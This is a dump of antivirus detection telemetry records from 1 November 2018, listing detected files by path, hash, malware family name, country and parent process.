  Row(detection=Row(filename='sejarah modul 2018.exe', filepath='E:\\SEJARAH MODUL 2018.exe', filesize=320000, name='W32/Sality.AT.#M1.#R1'), hash='7532c882984b01eb25172808830a989e68219cb039b4f51da366b66de18296a6', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T05:26:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='u3 sej 2017 baru fazri.exe', filepath='E:\\U3 SEJ 2017 BARU fazri.exe', filesize=320000, name='W32/Sality.AT.#M1.#R1'), hash='7532c882984b01eb25172808830a989e68219cb039b4f51da366b66de18296a6', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T05:26:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='018 - stamp [million ways to write part1].exe', filepath='E:\\music\\music\\Vampires 652 P\\018 - STAMP [Million ways to write part1]\\018 - STAMP [Million ways to write part1].exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='755d3a5bde52abefc6bdc48e7cc00ecebe31e3fcbb289f8a98cae8cea56175e3', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:13:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='75bcc7d8a53ebe6adaaa13ed26da4a6a21ac297e990c7a7dbccaaf3cfc887ea4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\75BCC7D8A53EBE6ADAAA13ED26DA4A6A21AC297E990C7A7DBCCAAF3CFC887EA4', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='75bcc7d8a53ebe6adaaa13ed26da4a6a21ac297e990c7a7dbccaaf3cfc887ea4', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:06:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='75bf7f16516cb1f587963c9d4c51830e7c063398affeb0a8cef3c3d6a61dda67', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\75BF7F16516CB1F587963C9D4C51830E7C063398AFFEB0A8CEF3C3D6A61DDA67', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='75bf7f16516cb1f587963c9d4c51830e7c063398affeb0a8cef3c3d6a61dda67', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:06:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='75efa335d6e6fa39037e5b8d36cb2330a618cc2b15ad2485f6296517b8e2d9e2', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\75EFA335D6E6FA39037E5B8D36CB2330A618CC2B15AD2485F6296517B8E2D9E2', filesize=104000, name='HEUR/AGEN.1032151.#M1.#R1'), hash='75efa335d6e6fa39037e5b8d36cb2330a618cc2b15ad2485f6296517b8e2d9e2', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:19:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110827-dfc8b8f9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ebd8e33d\\AVSCAN-20181101-110433-B6E35AA3\\AVSCAN-20181101-110827-DFC8B8F9', filesize=704000, name='TR/ExtenBro.uhnh.#M1.#R1'), hash='75f471467e42326408fc0484d2ff9cf7e39d3ea91f1afa207cd0c7e0acd27334', metadata=Row(cmdline=None, country='HR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:08:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='researchdownload.exe', filepath='g:\\ســــــــــــــــــــــــــوفـت\\فلاشات\\سامـــــــونج\\e1205t\\spt\\e2105y by hosam kashto\\e2105y by hosam kashto\\flash arabic turkey\\bin\\ResearchDownload.exe', filesize=1536000, name='W32/Ramnit.CD.#M1.#R1'), hash='761a47c48a643614c2922c5a7809c64dd06d7caaddc45e060ae9b684506688d1', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T21:57:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a6702363.exe', filepath='g:\\system volume information\\_restore{c748380e-fdee-4ba8-ac02-d3f7afc441fe}\\rp1689\\A6702363.exe', filesize=1536000, name='W32/Ramnit.CD.#M1.#R1'), hash='761a47c48a643614c2922c5a7809c64dd06d7caaddc45e060ae9b684506688d1', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:34:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mapdrive.exe', filepath='K:\\HBCD\\Programs\\MapDrive.exe', filesize=64000, name='TR/Agent.64000.23.#M1.#R1'), hash='761b1923e551a80eff514946add04f60da41d61100452d30ba6f76d5ebb76cbe', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='K:\\HBCD\\PStart.exe', parentsize=786952, timestamp='2018-11-01T17:00:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-190829-136bfe54', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190219-D4548F48\\AVSCAN-20181101-190829-136BFE54', filesize=64000, name='TR/Agent.64000.23.#M1.#R1'), hash='761b1923e551a80eff514946add04f60da41d61100452d30ba6f76d5ebb76cbe', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:08:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-123255-250f0bb9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1662c744\\AVSCAN-20181101-123242-23885628\\AVSCAN-20181101-123255-250F0BB9', filesize=1664000, name='HEUR/APC.#M1.#R1'), hash='7650bfb391ff1d9c4862b921cb0d606381200e89b5587479f3b1187c068860e2', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T10:32:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='renaultloader.exe', filepath='c:\\program files (x86)\\abrites commander software list\\renault504\\renaultloader.exe', filesize=1664000, name='HEUR/APC.#M1.#R1'), hash='7650bfb391ff1d9c4862b921cb0d606381200e89b5587479f3b1187c068860e2', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\Abrites Commander Software List\\QuickLoader.exe', parentsize=3083776, timestamp='2018-11-01T10:32:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miraster.dll', filepath='C:\\Program Files (x86)\\MapInfo\\Professional\\MIRASTER.DLL', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='767ec6863200f84d7650290f15ef74bb89b9afa6161edf0ae83ef46e6514ef89', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Update\\1.3.33.17\\GoogleCrashHandler64.exe', parentsize=366160, timestamp='2018-11-01T18:09:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ehshell.exe', filepath='\\\\?\\C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='76898d0e42bffe87a2d42526163e4a8a8dd5d997884a9d0a58af5b3bff9025d9', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:22:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='7695db58a17aa32b3dd07463a56ea50078d361af3009b73794834bf53f13819a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\7695DB58A17AA32B3DD07463A56EA50078D361AF3009B73794834BF53F13819A', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='7695db58a17aa32b3dd07463a56ea50078d361af3009b73794834bf53f13819a', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:53:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='start.exe', filepath='\\\\192.168.0.100\\kr-server\\廣羅\\kr-server\\server行政\\0管理部\\行政部\\工商萬用管理表格管理表格\\經營管理類\\start.exe', filesize=1536000, name='W32/Stanit.#M1.#R1'), hash='76a84b3f9652d21a1a93f6578a3fff9714c697e125c87d859e58e40858015ae2', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:dZLJlmOScUes48KI.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T00:57:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='downloader-fuer-textscan_.exe', filepath='H:\\Restmüll 4\\Downloads\\Downloader-fuer-textscan_.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='76b9bd2286dc9573366783f5fe7d8d181484d5b3c98a61203f6515498a6efb9c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T19:55:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='downloader-fuer-textscan_.exe', filepath='H:\\Restmüll 4\\Downloads\\Downloader-fuer-textscan_.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='76b9bd2286dc9573366783f5fe7d8d181484d5b3c98a61203f6515498a6efb9c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T19:55:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='downloader-fuer-textscan_.exe', filepath='H:\\Restmüll 4\\Downloads\\Downloader-fuer-textscan_.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='76b9bd2286dc9573366783f5fe7d8d181484d5b3c98a61203f6515498a6efb9c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T19:55:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0198500.exe', filepath='g:\\system volume information\\_restore{e0007dec-1129-45c8-a279-d04879e6ca59}\\rp75\\A0198500.EXE', filesize=3072000, name='W32/Sality.AT.#M1.#R1'), hash='76cf8ed3116768fe89ea7581339e051bcc241ad392a9c449da4fa2feb1158c32', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:44:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='thcs.exe', filepath='\\\\?\\C:\\Program Files (x86)\\THCS\\THCS.exe', filesize=704000, name='HEUR/APC.#M1.#R1'), hash='76e9768b805909feb2ce7f997821c61190ed3311553fdbb0843abe6efd11c893', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T00:24:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rossorabbitintrouble.exe', filepath='E:\\العاب\\جزرة الأرنوب\\RossoRabbitInTrouble.exe', filesize=1024000, name='W32/Sality.AT.#M1.#R1'), hash='76ee4527b42e705ddd5a24dba7cb044d23dcdc20b51f8431f6071cff5bade2e3', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T21:38:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='air mata mutiara.htm', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-01_13-10-48\\Air mata mutiara.htm', filesize=256000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='7735f6dc0230d0498acf397dbd2cc5983b77ec2375f2ecafb40e8650ffaffb39', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe21_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe21 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T06:50:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='773c8ff8e05e3ff7c217206f9b70373be0f33b0e2847dddb60dd659c00e54d87', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-5\\773C8FF8E05E3FF7C217206F9B70373BE0F33B0E2847DDDB60DD659C00E54D87', filesize=1344000, name='TR/Crypt.FKM.Gen.#M300.#R581'), hash='773c8ff8e05e3ff7c217206f9b70373be0f33b0e2847dddb60dd659c00e54d87', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:56:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='p3core.dll', filepath='C:\\Program Files (x86)\\HP Games\\Big Rig Europe\\p3core.dll', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='775d56f4852f83d896da3ae2bf8009f8f796bb65ba318dad946bf9af995c1a08', metadata=Row(cmdline='--engine=2 --session-id=5Ya6JSsEXoDpsMfbE4n3gocCgRj8vB0GshXDy+BN --registry-suffix=ESET', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\27.148.201\\software_reporter_tool.exe', parentsize=12623992, timestamp='2018-11-01T08:00:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='776beede732ca44a03977e2c4354c8a12ae5e091c292313f8107154de98b3f3d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\776BEEDE732CA44A03977E2C4354C8A12AE5E091C292313F8107154DE98B3F3D', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='776beede732ca44a03977e2c4354c8a12ae5e091c292313f8107154de98b3f3d', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:06:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='castsrv.exe', filepath='C:\\$WINDOWS.~BT\\NewOS\\Windows\\WinSxS\\x86_microsoft-windows-castserver_31bf3856ad364e35_10.0.17134.1_none_510114d1e1d1b62a\\CastSrv.exe', filesize=60000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='77a7de2f5473a3d62582bcc5bae9c97a861511f671f6c7b84f365b56f36f29c7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T07:57:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='castsrv.exe', filepath='C:\\Windows\\System32\\CastSrv.exe', filesize=60000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='77a7de2f5473a3d62582bcc5bae9c97a861511f671f6c7b84f365b56f36f29c7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:39:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='castsrv.exe', filepath='C:\\Windows\\SoftwareDistribution\\Download\\40e0103692e1ebbb162ed295f786b047\\x86_Microsoft-Windows-Client-Features-Package~~X86~~10.0.17134.1\\x86_microsoft-windows-castserver_31bf3856ad364e35_10.0.17134.1_none_510114d1e1d1b62a\\castsrv.exe', filesize=60000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='77a7de2f5473a3d62582bcc5bae9c97a861511f671f6c7b84f365b56f36f29c7', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:16:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='castsrv.exe', filepath='C:\\Windows\\SoftwareDistribution\\Download\\40e0103692e1ebbb162ed295f786b047\\x86_Microsoft-Windows-Client-Features-Package~~X86~~10.0.17134.1\\x86_microsoft-windows-castserver_31bf3856ad364e35_10.0.17134.1_none_510114d1e1d1b62a\\castsrv.exe', filesize=60000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='77a7de2f5473a3d62582bcc5bae9c97a861511f671f6c7b84f365b56f36f29c7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T08:36:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='crack.exe', filepath='C:\\Program Files (x86)\\The_Secret_0.1.2.2\\crack\\crack.exe', filesize=7936000, name='TR/Crypt.TPM.Gen.#M300.#R2977'), hash='77c91e39fd62c026c8a45d51bc5f65370b38bc1bffc700fae82bada75dbcfba6', metadata=Row(cmdline='-el -s2 \\\\\\"-dC:\\\\\\\\Program Files (x86)\\\\\\\\The_Secret_0.1.2.2\\\\\\" \\\\\\"-sp\\\\\\"', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='E:\\FINISHED\\New folder\\The_Secret_0.1.2.2\\The_Secret_0.1.2.2.exe', parentsize=2744250324, timestamp='2018-11-01T01:43:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='crack.exe', filepath='C:\\Program Files (x86)\\The_Secret_0.1.2.2\\crack\\crack.exe', filesize=7936000, name='TR/Crypt.TPM.Gen.#M300.#R2977'), hash='77c91e39fd62c026c8a45d51bc5f65370b38bc1bffc700fae82bada75dbcfba6', metadata=Row(cmdline='\\\\\\/systemstart \\\\\\/adminuser', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\IObit Malware Fighter\\IMF.exe', parentsize=5600528, timestamp='2018-11-01T01:43:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='crack.exe', filepath='C:\\Program Files (x86)\\The_Secret_0.1.2.2\\crack\\crack.exe', filesize=7936000, name='TR/Crypt.TPM.Gen.#M300.#R2977'), hash='77c91e39fd62c026c8a45d51bc5f65370b38bc1bffc700fae82bada75dbcfba6', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T01:43:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-234903-9a72aea0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b469cc29\\AVSCAN-20181031-234849-97AD99F6\\AVSCAN-20181031-234903-9A72AEA0', filesize=7936000, name='TR/Crypt.TPM.Gen.#M1.#R1'), hash='77c91e39fd62c026c8a45d51bc5f65370b38bc1bffc700fae82bada75dbcfba6', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:49:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='putty.exe', filepath='H:\\putty.exe', filesize=512000, name='TR/Patched.Gen.#M300.#R3367'), hash='77ce4135683e9eacca2bb102b4422901af013a53b50e242b875e2f0acbde0143', metadata=Row(cmdline=None, country='SN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T16:35:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='putty.exe', filepath='H:\\putty.exe', filesize=512000, name='TR/Patched.Gen.#M300.#R3367'), hash='77ce4135683e9eacca2bb102b4422901af013a53b50e242b875e2f0acbde0143', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T16:23:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='putty.exe', filepath='\\\\?\\H:\\putty.exe', filesize=512000, name='TR/Patched.Gen.#M300.#R3367'), hash='77ce4135683e9eacca2bb102b4422901af013a53b50e242b875e2f0acbde0143', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:40:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='driverupdater11027413.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa12696.32216\\driverupdater11027413.exe', filesize=2368000, name='HEUR/AGEN.1006920.#M1.#R1'), hash='780fe49b7b3b5c2f2d55f3d6eb9f521708a1798294766ccda3932c179995c0b1', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe', parentsize=6347056, timestamp='2018-11-01T20:23:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212543-e736a4e3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a900a272\\AVSCAN-20181101-212524-E39753F6\\AVSCAN-20181101-212543-E736A4E3', filesize=2368000, name='HEUR/AGEN.1006920.#M1.#R1'), hash='780fe49b7b3b5c2f2d55f3d6eb9f521708a1798294766ccda3932c179995c0b1', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:25:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='788a7154c56f23cf8dd0f4385223c47eaeffc9cbdbb8da9b6b18311f6d0fbf20', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\788A7154C56F23CF8DD0F4385223C47EAEFFC9CBDBB8DA9B6B18311F6D0FBF20', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='788a7154c56f23cf8dd0f4385223c47eaeffc9cbdbb8da9b6b18311f6d0fbf20', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:15:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sbn.exe', filepath='d:\\mis documentos\\papeles de trabajo_tia dulia\\usb yesenia\\siaf_presupuesto\\SBN.EXE', filesize=888000, name='HEUR/APC.#M1.#R1'), hash='7897d82378f9b8bd2ba7312663d433a0a82d497c1790f8161653b74db2e27563', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T14:07:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='78bd4880fc42aa752d3845e915df5031de8c30a39398aebcc96809652e060885', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\78BD4880FC42AA752D3845E915DF5031DE8C30A39398AEBCC96809652E060885', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='78bd4880fc42aa752d3845e915df5031de8c30a39398aebcc96809652e060885', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:06:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='steam_api_c.dll', filepath='G:\\game\\Counter-Strike Xtreme V5\\steam_api_c.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='78fd1eca0c6136dbeef9a4709ca96133275851c7219a7fee4a101bccb72285ad', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1772072, timestamp='2018-11-01T04:40:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='printqueuecleaner.exe', filepath='K:\\HBCD\\Programs\\PRINTQUEUECLEANER.EXE', filesize=64000, name='TR/Agent.64000.116.#M1.#R1'), hash='78fda789cdedfc745466d5fecd1dc02f6320d517cd7c10742964338d3e79d4a9', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='K:\\HBCD\\PStart.exe', parentsize=786952, timestamp='2018-11-01T17:01:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-195059-c6b9aeec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-194803-A89BA1A8\\AVSCAN-20181101-195059-C6B9AEEC', filesize=64000, name='TR/Agent.64000.116.#M1.#R1'), hash='78fda789cdedfc745466d5fecd1dc02f6320d517cd7c10742964338d3e79d4a9', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:51:00Z'), dt=datetime.date(2018, 11, 1)),
